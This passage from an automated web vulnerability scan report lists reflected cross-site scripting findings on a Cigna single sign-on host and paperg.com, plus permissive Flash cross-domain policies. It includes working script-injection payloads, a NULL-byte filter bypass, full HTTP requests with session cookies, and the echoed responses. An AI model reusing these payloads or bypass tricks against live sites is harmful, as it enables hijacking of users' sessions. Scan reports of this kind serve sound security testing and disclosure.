This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /corp/sso/professional/controller?command=forgotidbegin&PORTAL=member&DESTINATION=/corp/sso/professional/secure/controller?command=homepage%00b12dc"><script>alert(1)</script>64cebfa3f0d HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=781FB9EE7FD1107FC7FAA536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:26 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=906391387FD1107FCA65A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Id - Enter User Information</title>
<link rel="S
...[SNIP]...
<input type="button" value="Cancel" onClick="JavaScript:location.replace('/corp/sso/professional/secure/controller?command=homepage.b12dc"><script>alert(1)</script>64cebfa3f0d');">
...[SNIP]...

2.26. https://sso.corp.cigna.com/corp/sso/professional/controller [fname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1c3e"><script>alert(1)</script>bb6ceb1e7b2 was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /corp/sso/professional/controller HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotidbegin&PORTAL=member&DESTINATION=/corp/sso/professional/secure/controller?command=homepage
Cache-Control: max-age=0
Origin: https://sso.corp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=7FDE78B47FD1107FC856A536181C0CE6
Content-Length: 73

command=forgotidsrch&DOB=%2F%2F&fname=a1c3e"><script>alert(1)</script>bb6ceb1e7b2&lname=&DOB_MNT=&DOB_DAY=&DOB_YEAR=

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:33:33 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=DC6799A87FD1107FCF37A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Id - Enter User Information</title>
<link rel="S
...[SNIP]...
<input type="text" size="15" maxlength="25" name="fname" value="a1c3e"><script>alert(1)</script>bb6ceb1e7b2">
...[SNIP]...

2.27. https://sso.corp.cigna.com/corp/sso/professional/controller [lname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7324"><script>alert(1)</script>cce7d41f523 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /corp/sso/professional/controller HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotidbegin&PORTAL=member&DESTINATION=/corp/sso/professional/secure/controller?command=homepage
Cache-Control: max-age=0
Origin: https://sso.corp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=7FDE78B47FD1107FC856A536181C0CE6
Content-Length: 73

command=forgotidsrch&DOB=%2F%2F&fname=&lname=a7324"><script>alert(1)</script>cce7d41f523&DOB_MNT=&DOB_DAY=&DOB_YEAR=

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:33:40 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=E033B6027FD1107FCF70A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Id - Enter User Information</title>
<link rel="S
...[SNIP]...
<input type="text" size="15" maxlength="25" name="lname" value="a7324"><script>alert(1)</script>cce7d41f523">
...[SNIP]...

2.28. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [boards%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/albany-times-union/1552/0.html

Issue detail

The value of the boards%5B%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40279"><script>alert(1)</script>5f4ea1bf7dc was submitted in the boards%5B%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=186240279"><script>alert(1)</script>5f4ea1bf7dc&boards%5B%5D=1753&boards%5B%5D=1552 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045; __utmz=1.1305557272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027440590.1305557272.1305557272.1305557272.1; __utmc=1; __utmb=1.1.10.1305557272

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 5558


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
<script type="text/javascript" src="/jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279"><script>alert(1)</script>5f4ea1bf7dc&boards[]=1753&boards[]=1552">
...[SNIP]...

2.29. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b3b4'%3balert(1)//5cff8161487 was submitted in the bid parameter. This input was echoed as 8b3b4';alert(1)//5cff8161487 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=15528b3b4'%3balert(1)//5cff8161487 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 48336


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'alert(1)//5cff8161487'' at line 1
   var view_all_board = docume
...[SNIP]...
PG_scriptParent = PG_scriptEl.parentNode;

if(!board_id)
   var board_id=[];
if(!pub_id)    
   var pub_id=[];
if(!widget_id)
   var widget_id=[];

board_id[15528b3b4';alert(1)//5cff8161487] = 15528b3b4';alert(1)//5cff8161487;
pub_id[15528b3b4';alert(1)//5cff8161487] = 891;
widget_id[15528b3b4';alert(1)//5cff8161487] = 0;
var bid = 15528b3b4';alert(1)//5cff8161487;
var pid = 891;
var wid = 0;


var objBody = document.get
...[SNIP]...

2.30. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cabe8%3balert(1)//99cbe00d64a was submitted in the bid parameter. This input was echoed as cabe8;alert(1)//99cbe00d64a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552cabe8%3balert(1)//99cbe00d64a HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 48140


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL1552cabe8;alert(1)//99cbe00d64a = 'http://www.paperg.com/jsfb/embed.php?view=all&pid=891&cid=0&bid=1552cabe8%3balert(1)//99cbe00d64a';
// links stylesheets in head
function pg_linkss(filename)
{
   var head = document.getElementsByT
...[SNIP]...

2.31. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cd06"%3balert(1)//f522b4beeb1 was submitted in the bid parameter. This input was echoed as 9cd06";alert(1)//f522b4beeb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=15529cd06"%3balert(1)//f522b4beeb1 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 48159


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
PG_scriptParent = PG_scriptEl.parentNode;

if(!board_id)
   var board_id=[];
if(!pub_id)    
   var pub_id=[];
if(!widget_id)
   var widget_id=[];

board_id[15529cd06";alert(1)//f522b4beeb1] = 15529cd06";alert(1)//f522b4beeb1;
pub_id[15529cd06";alert(1)//f522b4beeb1] = 891;
widget_id[15529cd06";alert(1)//f522b4beeb1] = 0;
var bid = 15529cd06";alert(1)//f522b4beeb1;
var pid = 891;
var wid = 0;


var objBody = document.get
...[SNIP]...

2.32. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26471"-alert(1)-"f29968cc4e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279&26471"-alert(1)-"f29968cc4e9=1 HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=186240279%22%3E%3Cscript%3Ealert(1)%3C/script%3E5f4ea1bf7dc&boards%5B%5D=1753&boards%5B%5D=1552
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27786045.1907620487.1305558925.1305558925.1305558925.1; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:01:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 47764


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
pt may not be the last element
var PG_scriptEl = PG_scripts[ PG_scripts.length - 1 ];

if(PG_scriptEl.src != "http://www.paperg.com/jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279&26471"-alert(1)-"f29968cc4e9=1")
{
var page_script = '';
var i = 0;
for(i = 0; i < PG_scripts.length; i++)
{
page_script = PG_scripts[i];
if(page_script.src == "http://www.paperg.com/jsfb/em
...[SNIP]...

2.33. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbf8b'-alert(1)-'83f2db3f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279&cbf8b'-alert(1)-'83f2db3f50=1 HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=186240279%22%3E%3Cscript%3Ealert(1)%3C/script%3E5f4ea1bf7dc&boards%5B%5D=1753&boards%5B%5D=1552
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27786045.1907620487.1305558925.1305558925.1305558925.1; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:01:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 47761


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL1552 = 'http://www.paperg.com/jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279&cbf8b'-alert(1)-'83f2db3f50=1';
// links stylesheets in head
function pg_linkss(filename)
{
   var head = document.getElementsByTagName('head')[0];
   link = document.createElement('link');
   link.rel = 'stylesheet';
   link.media
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 11 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 17 May 2011 04:15:49 GMT
Date: Mon, 16 May 2011 04:15:49 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 46337

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.2. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:83e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:04 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.3. https://www.paperg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paperg.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:47 GMT
Server: Apache
Last-Modified: Wed, 09 Sep 2009 02:28:24 GMT
ETag: "105-4731bd6544200"
Accept-Ranges: bytes
Content-Length: 261
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!-- http://www.paperg.com/crossdomain.xml
-->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.4. http://www.placelocal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.placelocal.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:19:41 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Mon, 25 Oct 2010 19:42:00 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 15:19:41 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false" />
...[SNIP]...

3.5. http://ads.bridgetrack.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 810
Content-Type: text/html
Date: Mon, 16 May 2011 15:20:07 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
   <allow-access-from domain="travelerssaves.com" />
   <allow-access-from domain="moneyneedsattention.com" />
   <allow-access-from domain="www.moneyneedsattention.com"/>
   <allow-access-from domain="portal.kaplan.edu" />
   <allow-access-from domain="www.portal.kaplan.edu"/>
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

3.6. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

